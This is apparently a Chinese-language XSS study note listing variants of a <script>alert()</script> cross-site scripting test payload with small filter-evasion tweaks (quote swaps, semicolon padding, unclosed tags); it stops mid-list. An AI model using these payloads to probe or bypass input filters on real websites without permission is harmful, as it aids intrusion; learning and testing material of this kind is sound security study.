XSS学习总结
传统的script类
<script>alert(“xss”)</script>
<script>alert(/xss/)</script>
//双引号换成斜杠
<script>alert(‘xss’)</script>
//用单引号
<script>alert(“xss”);</script>
//用分号
<script>alert(‘xss’);</script>
<script>alert(/xss/);</script>
<script>alert(“jdq”)
//自动补全
<script>alert(“xss”);;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
//用分号
<script>alert(“xss”);;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
//空格+分号
<script>alert(“xss”);;;;;;;;;;;;;;;;; ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;</script>
//换行符
<